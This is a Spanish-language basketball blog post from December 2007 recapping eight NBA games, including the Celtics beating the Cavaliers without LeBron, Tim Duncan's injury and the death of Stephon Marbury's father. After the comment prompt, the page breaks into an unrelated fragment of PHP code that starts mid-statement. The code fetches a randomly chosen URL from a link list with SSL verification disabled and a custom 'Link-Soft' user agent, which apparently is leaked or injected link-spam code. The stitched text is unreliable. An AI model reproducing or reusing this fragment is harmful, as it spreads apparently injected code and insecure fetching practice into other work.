La crónica (2/12/07)

03 de December de 2007 por MagicJohnson32

La muerte del padre de Stephon Marbury marcó la pasada madrugada en la NBA. En los deportivo, destacó el enorme susto que se llevaron los aficionados de los Spurs cuando Tim Duncan se lesionó, algo que no impidió el contundente triunfo de su equipo ante los Blazers. Sin ninguna sorpresa, la emoción se limitó al Staples Center, que acogió dos partidos sellados con ajustados triunfos visitantes: primeros, de los Pacers sobre los Clippers y, a continuación, de los Magic sobre los Lakers.

Vamos con las crónicas de los partidos disputados anoche:

Cavs 70 – 80 Celtics

No jugó LeBron, y los que jugaron tampoco contribuyeron demasiado al espectáculo. Los Celtics se impusieron en un partido muy gris a los Cavs, que se presentaron en Boston sin su jugador franquicia y no pudieron oponer excesiva resistencia a un conjunto que, incluso en días poco inspirados ofensivamente, domina a su rival echando mano de su excelente defensa. Ambos equipos tuvieron menos de un 40% de acierto en sus tiros y sólo Ray Allen anotó más de 12 puntos. Boston contó con los 20 puntos, 4 rebotes y 3 asistencias de Allen, más 12 puntos de Rondo como principales contribuciones ofensivas. Garnett y Pierce se quedaron en 9 y 7 puntos respectivamente con 4 de 19 en lanzamientos. Pero los Cavs se encontraron absolutamente huérfanos en ataque y ni Gooden, con 4 de 11, ni Ilgauskas, que hizo 3 de 12, ni Pavlovic, con 5 de 14, fueron capaces de hacer olvidar la ausencia de LeBron.

Pacers 101 – 95 Clippers

Los Pacers se han convertido en un equipo imprevisible. Su gira por el Oeste marchaba de forma magnífica, con victorias en Denver y Portland, hasta que el viernes, con Jermaine O’Neal de vuelta tras su lesión, cayeron en Seattle ante el peor equipo de la presente temporada. Anoche, en cambio, se recuperaron de la mano de Jamaal Tinsley, autor de 29 puntos, 7 rebotes, 7 asistencias y 3 robos. El base logró 10 puntos en los últimos cuatro minutos de partido y contó con la ayuda de Jermaine O’Neal, que hizo 20-15. No sirvieron los 22 puntos, 22 rebotes y 5 tapones de Kaman para unos Clippers sin Elton Brand, Shaun Livingston ni Sam Cassell y que además perdieron al rookie Al Thornton por una fuerte torcedura de tobillo.

Blazers 79 – 100 Spurs

Un escalofrío recorrió la espaldas de todos los aficionados de los Spurs cuando, durante la primera mitad del partido ante los Blazers, Tim Duncan se lesionó y hubo de ser ayudado para abandonar la pista. A sus compañeros pareció no importarle, ya que pasaron por encima de los Blazers igualmente, con un Tony Parker casi infalible, autor de 27 puntos con 11 de 15 en tiros. Los de Popovich dejaron a Roy en 1 de 9, y a Aldridge en 2 de 8. Únicamente Webster y Outlaw pudieron anotar con cierta facilidad y lograron 17 puntos cada uno. Sergio jugó casi 13 minutos y logró 6 puntos y 2 asistencias, mientras que el mejor escudero para Parker fue Brent Barry, con 17-5-3.

Nets 95 – 118 Pistons

Lo de anoche en Auburn Hills parecía un partido del Oeste. Pero no, eran Nets y Pistons, dos rivales clásicos de las eliminatorias del Este, los que jugaron un encuentro de alta anotación en la que los de Michigan impusieron su mayor variedad de recursos. Los Pistons, liderados por Billups con 18-9 y Maxiell con 18-11, anotaron un 56% de sus tiros y dejaron a los Nets en el 45,5% para sentenciar el partido pronto, con una diferencia de 20 puntos al finalizar el tercer período. Kidd, Carter y Jefferson, como siempre, fueron los más destacados por los Nets.

Suns 115 – 104 Knicks

La muerte del padre de Stephon Marbury durante la disputa del partido entre Knicks y Suns restó importancia a una nueva derrota de los neoyorquinos. El protagonista deportivo fue Grant Hill, que recordó al de sus mejores tiempos con 28 puntos (13 de 17 en tiros), 8 rebotes, 7 asistencias y 3 robos. Similares números obtuvo Stoudemire, con 28 puntos en 12 de 17, 12 rebotes y 3 asistencias. 15 puntos de Marion y Barbosa, 12 de Bell y 15 asistencias de Nash acabaron con la resistencia de los Knicks, pese a los 61 puntos del trío Marbury-Randolph-Curry.

Heat 89 – 115 Nuggets

Cuando acabas el primer cuarto perdiendo por 20 sueles acabar perdiendo. Si le añades un parcial de -11 en el tercer cuarto, las probabilidades se acercan al 100%. Los Heat encajaron un 17-37 en el periodo inicial y un 22-33 en el tercero en su visita a Colorado, de donde salieron con una nueva derrota, la duodécima de la temporada. Shaq, que venía quejándose del juego de su equipo y de recibir muy pocos balones, tuvo una desafortunada actuación, se cargó de faltas pronto, anotó sólo 3 de sus 7 lanzamientos, se quedó en 6 puntos e incluso falló un mate. Wade tampoco tuvo suerte, cometió tres faltas en el primer cuarto y apenas jugó 20 minutos en los que anotó 13 puntos. Aun así, fue el máximo anotador de su equipo, mientras que por los Nuggets Anthony obtuvo 30, Iverson y Kenyon Martin lograron 20 cada uno, y Camby dominó las zonas con 21 rebotes

Warriors 109 – 96 Sonics

Poco le costó a los Warriors encarrilar su partido ante los Sonics. Un 35-18 en el primer cuarto dejó constancia del gran momento que atraviesan los de Oackland, que ya están 9-7 y volvieron a ofrecer su habitual arsenal ofensivo: 20 puntos de Harrington y Jackson, 18 con 16 rebotes de Biedrins, 18-4-5 de Ellis, 14-8-9-4 de Baron Davis y otros 14 de Azubuike desde el banco. En los Sonics destacó Durant por todo lo contrario: 2 de 12 en lanzamientos, sin asistencias y con 3 pérdidas. Wilcox, autor de 16 puntos y 11 rebotes, Watson, que desde el banco aportó 16-5-5, y Jeff Green, con 13 puntos y 8 rebotes, se salvaron por los Sonics, que volvieron a jugar sin Collison ni Ridnour.

Magic 104 – 97 Lakers

Partido muy equilibrado el que jugaron Orlando y Lakers anoche en el Staples Center y que se decidió en los últimos minutos del lado visitante. Un parcial de 9-0 comandado por Hedo Turkoglu acabó con las esperanzas de los Lakers, pese al trabajo de contención llevado a cabo sobre Dwight Howard, quien se quedó en 17 puntos, 8 rebotes y 5 tapones, en gran parte por el trabajo de Andrew Bynum, que colocó 7 tapones. Pero Rashard Lewis, Turkoglu y Dooling anotaron 14 o más puntos y sumaron 15 rebotes y 18 asistencias para superar a unos Lakers en los que no sirvió con el buen partido de Odom, autor de 19 puntos y 17 rebotes. Bryant volvió a ser el máximo anotador con 28, a los que añadió 6 rebotes y 5 asistencias, pero tras un primer cuarto espectacular, con 19 puntos, no pudo llevar a su equipo al triunfo en un tramo final en el que los Magic estuvieron mucho más acertados.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>